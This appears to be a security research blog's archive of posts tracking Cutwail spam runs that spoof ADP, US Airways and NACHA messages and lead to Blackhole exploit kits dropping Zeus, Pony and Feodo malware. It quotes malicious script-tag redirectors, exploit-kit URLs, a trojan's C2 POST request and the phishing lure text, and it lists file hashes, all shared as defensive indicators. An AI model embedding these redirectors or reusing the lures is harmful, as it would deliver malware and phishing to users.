Tag Archives: cutwail

ADP Funding Notification – Debit Draft

Weve been quiet recently, but we havent stopped our work. Behind the scenes weve been developing some new tools and techniques that we hope will enable us to more efficiently track the bad guys. We used some of these new tools and techniques in our analysis of a new spam run today that spoofed communications from ADP. We observed spam messages with the subject line “ADP Funding Notification – Debit Draft”. The spam sample we analyzed was sent from – a known Cutwail spambot.

The link in this message directed victims to junnioreadriano.com.br/MZ0PnMj5/index.html. Note that our bad guys are still using the same /8-random-character/index.html pattern. This page contained the following two malicious javascript redirectors:


These javascripts redirector victims to a Blackhole Exploit kit at This Blackhole exploit kit was hosting at least 9 different malicious payloads. Detected malware payloads identified by MD5 hash included the following:


All of these binaries appear, upon initial inspection, to be Pony downloaders.


US Airways online check-in

The hits kept rolling in today. We observed another new spam template. This new template spoofed communications from US Airways.

The spam sample we observed had a subject line of “US Airways online check-in”. Other subject lines in circulation were:

  • Please confirm your US Airways online registration
  • US Airways online check-in confirmation

The sample we observed had the following malicious link:

  • hiphopromania.info/Qb09JCw7/index.html
  • maricicastoica.info/UUYaWnvq/index.html

Note that these new templates still leveraged the same random 8-character pattern in the URI path seen in other Cutwail generated spam pushing Gameover Zeus. This pattern remains a good indicator for detecting these spam campaigns.

The malicious link, hiphopromania.info/Qb09JCw7/index.html, contained the following javascript redirectors:

<script type=”text/javascript” src=”http://akdenizilaclama.com/eRNZruZY/js.js”></script&gt;
<script type=”text/javascript” src=”http://bushman-panoramic.fr/njHeWGPi/js.js”></script&gt;
<script type=”text/javascript” src=”http://globaltransact.co.za/reQ9z72V/js.js”></script&gt;
<script type=”text/javascript” src=”http://greenberg.bg/E0Lhcg6B/js.js”></script&gt;
<script type=”text/javascript” src=”http://www.creazionimultimediali.net/XvpMHseV/js.js”></script&gt;

The malicious javascripts redirected victims to a Blackhole Exploit kit http://slickvenue.com/showthread.php?t=d44175c6da768b70.

This Blackhole Exploit Kit dropped a Gameover Zeus payload with the following properties:

File: contacts.exe
Size: 284184
MD5: 4617153B1E91F364FB3E7B7C4A64E1B3

Note that the filename of contacts.exe is randomly selected from a pool of filenames. Blackhole Exploit Kits drop files with the following names: about.exe, contacts.exe, calc.exe, readme.exe, info.exe, etc.

This Gameover Zeus payload had a botid of ‘ppcz20’ sent stolen data to a dropzone at over port 17615.

Note that this botid was also seen in the previous posts “Careerbuilder spam delivers more than just a new job posting” and “USPS themed spam“.

Fwd: Re: Security update for banking accounts

We were able to track down the ACH/Wire-themed spam referred to in our “Next Day Malware” post. The observed sample had the following text:

Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details

Best regards,
Security department


This sample was sent from the IP address This IP is apart of a Cutwail spambot.

The ‘View details’ text contained a hyperlink to hxxp://www[.]weight-losstoday[.]com/wp-content/themes/illustration-too-10/nacha-index.htm. This html page contained an iframe to hxxp://cgunikqakklsdpfo[.]ru:8080/img/?promo=nacha.

Note the exploit kit at cgunikqakklsdpfo[.]ru. This is the same kit we saw mentioned in our “Next Day Malware” post.

Victims were then redirected to fedikankamolns[.]ru, where they downloaded a Bugat/Feodo banking trojan with the MD5 286918DE8BEE1CACD3A1089076C3DE45. This sample was only detected by 3 of 43 AV vendors on VirusTotal.

This Bugat/Feodo variant retrieved its configuration file/target list via the following POST request to hjpyvexsutdctjol[.]ru:

POST /rwx/B1_3n9/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: hjpyvexsutdctjol[.]ru:8080
Content-Length: 109
Connection: Keep-Alive
Cache-Control: no-cache

Yeah, we know … this is identical to the DHL and FedEx spam runs documented in our earlier post.

What we found interesting about the NACHA spam was that it leveraged the legitimate nacha.org site in its social engineering efforts. The exploit kit at cgunikqakklsdpfo[.]ru appears to pull content from the legitimate http://www.nacha.org website and dynamically assemble the phishing page below.

Note the inclusion of a malicious link to a fake transaction report. That link points to hxxp://cgunikqakklsdpfo[.]ru:8080/img/?file=report-ACH782316225975342US.exe. As you recall from our “Next Day Malware” post the sample hosted at this location has an MD5 of 82c95751e71c829b09fef4166a749e67 – the same hash used in the DHL and FedEx spam runs.

It seems that the bad guys set this page up as a fallback in the case that visitors are not vulnerable to the exploits packaged in the exploit kit at cgunikqakklsdpfo[.]ru. Those users that are patched may still fall victim to this clever social engineer lure.